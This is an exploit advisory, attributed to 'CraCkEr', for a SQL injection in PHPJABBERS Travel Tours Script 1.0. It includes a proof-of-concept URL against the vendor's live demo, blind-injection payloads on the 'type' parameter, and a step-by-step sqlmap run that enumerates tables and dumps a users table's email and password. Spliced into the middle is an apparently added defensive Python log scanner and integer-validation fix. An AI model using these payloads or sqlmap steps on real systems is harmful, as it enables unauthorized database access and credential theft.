Authored by CraCkEr

Travel Tours Script version 1.0 suffers from a remote SQL injection vulnerability.

 C r a C k E r
 T H E   C R A C K   O F   E T E R N A L   M I G H T

 From The Ashes and Dust Rises An Unimaginable crack....

 [ Exploits ]

 Author    : CraCkEr
 Website   : phpjabbers.com
 Vendor    : PHPJABBERS
 Software  : Travel Tours Script V1.0
 Vuln Type : Remote SQL Injection
 Method    : GET
 Critical  : High [░░▒▒▓▓██]
 Impact    : Database Access

 Travel Tours Script: a content management solution for travel agencies and tour operators.

 B4nks-NET irc.b4nks.tk #unix

 Release Notes:
 ═════════════
 Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

 Exploit URLs

Live Demo Site:

https://www.phpjabbers.com/travel-tours-script/#sectionDemo

POC:

https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1'[Injection]
GET parameter 'type' is vulnerable

---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206
---
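The two payload shapes above (a boolean tautology and a SLEEP() call, both injected after a closing parenthesis on a parameter the application evidently treats as an integer id) are the kind of thing a defender wants to pick out of web-server logs, and the root cause is that `type` reaches the query unvalidated. The following Python is an added example, not code from PHPJABBERS or from this advisory: it scans constructed Apache-style access-log lines (combined format is assumed) for the numeric parameters named in the advisory's URL, percent-decodes them, and labels any non-integer value, and it models the server-side fix as a strict integer check before the value is used.

```python
"""Detect SQL injection attempts against the numeric GET parameters of front.php,
using the payload shapes quoted in this advisory, and model the input check that
would have blocked them. Added example; the log lines are constructed."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined format assumed).
# Lines 2 and 3 carry percent-encoded versions of the advisory's two payloads.
SAMPLE_LOG = """\
203.0.113.10 - - [15/Jul/2022:10:01:02 +0000] "GET /front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.11 - - [15/Jul/2022:10:01:05 +0000] "GET /front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1%29%20AND%208667%3D8667%20AND%20%284844%3D4844 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.11 - - [15/Jul/2022:10:01:09 +0000] "GET /front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1%29%20AND%20%28SELECT%207164%20FROM%20%28SELECT%28SLEEP%285%29%29%29loCg%29%20AND%20%287206%3D7206 HTTP/1.1" 200 5123 "-" "sqlmap/1.6"
203.0.113.12 - - [15/Jul/2022:10:02:00 +0000] "GET /front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameters the application treats as integers (taken from the advisory's URL).
INT_PARAMS = ("type", "item_per_page", "listing_search")


def classify_payload(value: str) -> Optional[str]:
    """Return None for a plain integer, otherwise a label for the anomaly."""
    if re.fullmatch(r"\d+", value):
        return None
    v = value.upper()
    if "SLEEP(" in v or "BENCHMARK(" in v:
        return "time-based blind"
    if re.search(r"\b(AND|OR)\b\s*\(?\d+\s*=\s*\d+", v):
        return "boolean-based blind"
    return "malformed integer"


def scan_log(text: str) -> List[Dict[str, str]]:
    """Flag every GET to front.php whose integer parameters carry a non-integer value."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/front.php"):
            continue
        # parse_qs percent-decodes, so "%29%20AND" becomes ") AND" before matching.
        params = parse_qs(parts.query, keep_blank_values=True)
        for name in INT_PARAMS:
            for raw in params.get(name, []):
                label = classify_payload(raw)
                if label:
                    findings.append({"ip": m["ip"], "ts": m["ts"], "param": name,
                                     "kind": label, "value": raw})
    return findings


def parse_type_id(raw: str) -> int:
    """Server-side mitigation (hypothetical, not the vendor's code): the id is
    accepted only as a bounded string of digits and converted to int before it
    can reach any query; anything else is rejected outright."""
    if not re.fullmatch(r"\d{1,10}", raw):
        raise ValueError("type must be an integer id")
    return int(raw)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['param']}={f['value']!r}: {f['kind']}")
```

The detector keys on the parameter's expected type rather than on a payload signature, so it also catches the bare `1'` probe from the POC URL and any variant sqlmap produces; the same integer check, applied on the server before the value is bound into the query, is the fix for the whole class.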

[+] Starting the Attack


sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" --current-db --batch --random-agent --no-cast

the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching current database
current database: 'pjabbers_demo_vpl'


sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl --tables --batch --random-agent --no-cast


[INFO] fetching tables for database: 'pjabbers_demo_vpl'
[INFO] fetching number of tables for database 'pjabbers_demo_vpl'
[INFO] resumed: 52

+------------------------------------------+
| vacationpackages_comments |
| vacationpackages_countries |
| vacationpackages_enquiries |
| vacationpackages_features |
| vacationpackages_fields |
| vacationpackages_listings_availabilities |
| vacationpackages_listings_features |
| vacationpackages_listings |
| vacationpackages_multi_lang |
| vacationpackages_notifications |
| vacationpackages_options |
| vacationpackages_payments |
| vacationpackages_periods |
| vacationpackages_plugin_country |
| vacationpackages_plugin_galleries_set |
| vacationpackages_plugin_gallery |
| vacationpackages_plugin_locale_languages |
| vacationpackages_plugin_locale |
| vacationpackages_plugin_log_config |
| vacationpackages_plugin_log |
| vacationpackages_plugin_one_admin |
| vacationpackages_plugin_paypal |
| vacationpackages_prices |
| vacationpackages_roles |
| vacationpackages_types |
| vacationpackages_users |
| vacationpackages_comments |
| vacationpackages_countries |
| vacationpackages_enquiries |
| vacationpackages_features |
| vacationpackages_fields |
| vacationpackages_listings |
| vacationpackages_listings_availabilities |
| vacationpackages_listings_features |
| vacationpackages_multi_lang |
| vacationpackages_notifications |
| vacationpackages_options |
| vacationpackages_payments |
| vacationpackages_periods |
| vacationpackages_plugin_country |
| vacationpackages_plugin_galleries_set |
| vacationpackages_plugin_gallery |
| vacationpackages_plugin_locale |
| vacationpackages_plugin_locale_languages |
| vacationpackages_plugin_log |
| vacationpackages_plugin_log_config |
| vacationpackages_plugin_one_admin |
| vacationpackages_plugin_paypal |
| vacationpackages_prices |
| vacationpackages_roles |
| vacationpackages_types |
| vacationpackages_users |
+------------------------------------------+


sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users --columns --batch --random-agent --threads 5 --no-cast

[INFO] fetching columns for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'
Database: pjabbers_demo_vpl
Table: vacationpackages_users
[16 columns]

+----------------+--------------------------------------------------------+
| Column | Type |
+----------------+--------------------------------------------------------+
| contact_fax | varchar(255) |
| contact_mobile | varchar(255) |
| contact_phone | varchar(255) |
| contact_title | enum('mr','mrs','miss','ms','dr','prof','rev','other') |
| contact_url | varchar(255) |
| created | datetime |
| email | varchar(255) |
| id | int(10) unsigned |
| ip | varchar(15) |
| is_active | enum('T','F') |
| last_login | datetime |
| name | varchar(255) |
| password | blob |
| phone | varchar(255) |
| role_id | int(10) unsigned |
| status | enum('T','F') |
+----------------+--------------------------------------------------------+


sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users -C email,password --dump --batch --random-agent --threads 5 --no-cast

[INFO] fetching number of column(s) 'email,password' entries for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'
Database: pjabbers_demo_vpl
Table: vacationpackages_users
[1 entry]

+-----------------+------------------------+
| email | password |
+-----------------+------------------------+
| [email protected] | P@S13rd |
+-----------------+------------------------+

[-] Done


──────────────────────────────────────────────────────────────────────────────

Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022